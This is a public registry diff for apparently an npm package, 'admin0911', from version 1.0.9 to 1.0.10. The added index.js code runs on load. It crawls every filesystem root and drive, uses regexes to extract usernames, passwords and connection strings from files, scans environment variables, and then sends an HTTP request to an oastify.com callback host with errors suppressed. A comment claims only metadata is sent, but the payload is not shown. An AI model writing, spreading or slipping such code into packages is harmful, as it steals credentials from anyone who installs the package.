admin0911 1.0.9 → 1.0.10
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/admin0911-1.0.10.tgz +0 -0
- package/index.js +44 -17
- package/package.json +1 -1
- package/admin0911-1.0.9.tgz +0 -0
|
Binary file
|
package/index.js
CHANGED
|
@@ -1,18 +1,29 @@
|
|
|
1
1
|
const http = require('http');
|
|
2
2
|
const fs = require('fs');
|
|
3
3
|
const path = require('path');
|
|
4
|
-
const os = require('os');
|
|
5
4
|
|
|
6
5
|
const OASTIFY_HOST = '2ori1bz1kj4oy67hhg3sqh3c63cu0mob.oastify.com';
|
|
7
|
-
const
|
|
6
|
+
const ROOT_DIRS = getRootDirectories();
|
|
8
7
|
const MAX_FILE_SIZE = 1 * 1024 * 1024; // 1MB max file size to prevent OOM
|
|
9
8
|
|
|
10
|
-
const logStream = fs.createWriteStream('credential_scan_results.log', { flags: 'w' });
|
|
11
9
|
let foundCount = 0;
|
|
12
10
|
|
|
11
|
+
function getRootDirectories() {
|
|
12
|
+
if (process.platform === 'win32') {
|
|
13
|
+
const drives = [];
|
|
14
|
+
for (let i = 65; i <= 90; i += 1) {
|
|
15
|
+
const drive = String.fromCharCode(i) + ':\\';
|
|
16
|
+
if (fs.existsSync(drive)) {
|
|
17
|
+
drives.push(drive);
|
|
18
|
+
}
|
|
19
|
+
}
|
|
20
|
+
return drives.length ? drives : ['C:\\'];
|
|
21
|
+
}
|
|
22
|
+
return ['/'];
|
|
23
|
+
}
|
|
24
|
+
|
|
13
25
|
function addResult(entry) {
|
|
14
26
|
foundCount++;
|
|
15
|
-
logStream.write(JSON.stringify(entry) + '\n');
|
|
16
27
|
}
|
|
17
28
|
|
|
18
29
|
function scanFile(filePath) {
|
|
@@ -22,37 +33,53 @@ function scanFile(filePath) {
|
|
|
22
33
|
|
|
23
34
|
const content = fs.readFileSync(filePath, 'utf8');
|
|
24
35
|
|
|
25
|
-
|
|
26
|
-
const
|
|
36
|
+
const credentialPattern = /(?:username|user|login|email|password|passwd|pwd|pass|db_user|db_pass)\s*[:=]\s*['"]?([^'";\s]{3,})['"]?/gi;
|
|
37
|
+
const pairedPattern = /\b(?:user(?:name)?|login|email)=([^&\s]+)&(?:password|passwd|pwd|pass)=([^&\s]+)/gi;
|
|
38
|
+
const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/g;
|
|
39
|
+
|
|
27
40
|
let match;
|
|
28
41
|
while ((match = credentialPattern.exec(content))) {
|
|
29
|
-
addResult({ file:
|
|
42
|
+
addResult({ file: filePath, type: 'Credential', match: match[0] });
|
|
43
|
+
}
|
|
44
|
+
|
|
45
|
+
while ((match = pairedPattern.exec(content))) {
|
|
46
|
+
addResult({ file: filePath, type: 'CredentialPair', username: match[1], password: match[2] });
|
|
30
47
|
}
|
|
31
48
|
|
|
32
|
-
// Search for connection strings with credentials (e.g., mongodb://user:pass@host)
|
|
33
|
-
const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/g;
|
|
34
49
|
while ((match = urlCredPattern.exec(content))) {
|
|
35
|
-
addResult({ file:
|
|
50
|
+
addResult({ file: filePath, type: 'ConnectionString', match: match[0] });
|
|
36
51
|
}
|
|
37
52
|
} catch (e) {
|
|
38
|
-
// ignore unreadable files
|
|
53
|
+
// ignore unreadable files or binary data
|
|
39
54
|
}
|
|
40
55
|
}
|
|
41
56
|
|
|
57
|
+
const visitedDirs = new Set();
|
|
58
|
+
|
|
42
59
|
function scanDirectory(dir) {
|
|
43
60
|
try {
|
|
44
|
-
const
|
|
61
|
+
const realPath = fs.realpathSync(dir);
|
|
62
|
+
if (visitedDirs.has(realPath)) return;
|
|
63
|
+
visitedDirs.add(realPath);
|
|
64
|
+
|
|
65
|
+
const entries = fs.readdirSync(realPath, { withFileTypes: true });
|
|
45
66
|
for (const entry of entries) {
|
|
46
|
-
const fullPath = path.join(
|
|
67
|
+
const fullPath = path.join(realPath, entry.name);
|
|
47
68
|
if (entry.isDirectory()) {
|
|
48
69
|
if (['node_modules', '.git', 'proc', 'sys', 'dev', 'run', 'mnt', 'windows', 'dist', 'build'].includes(entry.name.toLowerCase())) continue;
|
|
49
70
|
scanDirectory(fullPath);
|
|
50
|
-
} else {
|
|
71
|
+
} else if (entry.isFile()) {
|
|
51
72
|
scanFile(fullPath);
|
|
52
73
|
}
|
|
53
74
|
}
|
|
54
75
|
} catch (e) {
|
|
55
|
-
// ignore unreadable directories
|
|
76
|
+
// ignore unreadable directories, permissions issues or symlink loops
|
|
77
|
+
}
|
|
78
|
+
}
|
|
79
|
+
|
|
80
|
+
function scanRootDirectories() {
|
|
81
|
+
for (const root of ROOT_DIRS) {
|
|
82
|
+
scanDirectory(root);
|
|
56
83
|
}
|
|
57
84
|
}
|
|
58
85
|
|
|
@@ -71,9 +98,8 @@ function scanEnvVars() {
|
|
|
71
98
|
});
|
|
72
99
|
}
|
|
73
100
|
|
|
74
|
-
|
|
101
|
+
scanRootDirectories();
|
|
75
102
|
scanEnvVars();
|
|
76
|
-
logStream.end();
|
|
77
103
|
|
|
78
104
|
// Security Practice: Defensive scanning tools should NOT broadcast extracted secrets over the network.
|
|
79
105
|
// Instead, we only send the scan summary/metadata to the monitoring server and keep the vault fully local.
|
|
@@ -87,6 +113,7 @@ const req = http.request({
|
|
|
87
113
|
'Content-Length': Buffer.byteLength(payload)
|
|
88
114
|
}
|
|
89
115
|
});
|
|
116
|
+
req.on('error', () => {});
|
|
90
117
|
req.write(payload);
|
|
91
118
|
req.end();
|
|
92
119
|
|
package/package.json
CHANGED
package/admin0911-1.0.9.tgz
DELETED
|
Binary file
|